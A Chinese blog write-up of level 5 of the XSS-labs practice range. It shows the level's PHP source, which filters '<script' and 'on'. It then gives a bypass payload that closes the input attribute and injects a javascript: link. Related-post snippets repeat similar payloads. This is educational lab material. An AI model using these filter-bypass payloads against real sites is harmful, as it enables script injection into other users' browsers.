XSS-labs-level5详解

最新推荐文章于 2024-06-16 22:45:48 发布
最新推荐文章于 2024-06-16 22:45:48 发布
阅读量128 收藏 1
点赞数 1
分类专栏: XSS-labs 文章标签: xss 数学建模 matlab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/130929452
版权

访问题目url

 

直接上经典语句试一下

<script>alert('xss')</script>

这时候发现我们的输入的语句发生了改变

 

我们直接去看一下源代码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level6.php?keyword=break it out!"; 
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>

经过两次特殊字符的替换:将所有“<script”替换为“<scr_ipt”,并将所有“on”替换为“o_n”。所以我们只能换一个属性进行恶意植入了

"><a href=javascript:alert('xss')>xss</a>//

 点击xss即可进行弹窗操作

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-labs通关记录(level1~5)
qq_39670065的博客
07-23 460
在phpstudy中搭建xss-labs level-1 观察url地址会发现?name=test
XSS-Game level 5
热门推荐
wangyuxiang946的博客
07-07 1万+
第五关过滤了 <script> 和 on 事件 , 使用 a 标签绕过 源码中,过滤了大小写,替换了 <script 标签 和 on 事件 , 并将参数拼接到 value的值 使用htmlspecialchars() 过滤标签 , 但未重新赋值给 $str , 所以不会造成影响 我们使用 a 标签绕过 , payload "><a href="javascript:alert(5)">aaa</a> 左边的双引号用来闭...
5.xss之旅—Level5
qwsn
03-13 1762
XSS过程: 输入框:<script>alert(/qwsn/)</script> //查看源码,发现:脚本被写作input标签的value属性内,script被过滤 <input name=keyword value="<scr_ipt>alert(/qwsn/)</script>"> 构造paylod: "> onclic...
XSS之xss-labs-level5
Hugu
02-23 403
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代
XSS闯关——第五关:level5
老夏家的云
11-09 3755
第五关:level5 输入语句测试 "&gt; &lt;script&gt;alert('yes')&lt;/script&gt; 观察源代码发现字符被替换 把部分字符换成大写尝试 "&gt; &lt;sCRipt&gt;alert('yes')&lt;/scRipt&gt;   一样的结果   采用html事件方法: 失败   同样是字符被替换 ...
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs.zip
03-18
xss-labs是一个网站,其中包含了20个含有XSS漏洞的网页,用于学习XSS。
xss-labs/level5
m0_71299382的博客
11-28 216
xss-labs/level5
xss-labs前五关 详细
五分之一世纪
01-21 373
(1)什么是xss xss的外国名字是cross-site-script。俗称跨站脚本,是一种注入攻击,指攻击者在被攻击的网页上利用编写时的漏洞注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行。有三种类型,分别是: 反射型 存储型(持续性) dom型 提要:(以下只是自己的猜测) 我进行了部分函数的测试,观察源码,发现有内嵌的脚本,同时发现只有注入的脚本是alert()函数才能生效,其它函数则不行,查看集成环境中的源码后发现源码调用了ini_set()函数,原本的语句为ini_set
xss-labs靶场1-5关
zyh1588的博客
11-21 282
小白回顾xss靶场1-5关
记录xss练习 level1-level5(一)
CN_DS的博客
11-28 1004
练习网址:http://test.xss.tv/ 本人菜鸟一枚,如有分析不对的地方,望前辈们指正。 话不投机....不对,话不多说直接上图,上分析。 level1:很简单的一道题,从URL中我们可以分析到,xxx/level1.php?name=test,有一个参数;然后在firebug或源码页面找到它所在的位置,发现只有一处,在<h1></h1>标签内,直接一‘脚’...
XSS小游戏学习笔记(level 1-10)
烟敛寒林的博客
09-21 3234
XSS小游戏 level 1 右键查看页面源代码 &lt;script&gt; window.alert = function() { confirm("完成的不错!"); window.location.href="level2.php?keyword=test"; } &lt;/script&gt; 即提示你要让网页弹框,修改url后面的参数 http://l...
xss-labs靶场训练(5-9关)
ldzhhh的博客
05-21 576
第一关 先试一下经典的payload: 这里把script过滤了 onclick也被过滤了 onmouseover也同样被过滤了,尝试用标签执行javascript:伪协议。 Payload: ”><a href=javascript:alert()>xss</a>` 点击一下搜索按钮左侧的xss就成功弹窗了 后台关键代码: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keywor
xss+csrf项目实例
最新发布
qq_64302290的博客
06-16 277
如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w提取码:4444。
Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection
weixin_42451330的博客
06-12 448
本文对Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection 进行了介绍,列举了常用指令及示例。
xss-lab的level11-level14
qq_64775230的博客
06-16 8
" onfocus=javascript:alert() type="text把这个填在referer里即可。但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点。所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer。但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss。查看了一下源代码,发现接收的是用户的cookie。而且大于号是被删掉了,但是可以使用伪协议。但是要注意的是大于号是被删除了。value里的是UA头。
xss-lab靶场level1-level10
qq_64775230的博客
06-16 121
标签一起使用,以上面图片的html标签为例,标签是有输入框的,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码。">友情链接';echo '友情链接
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值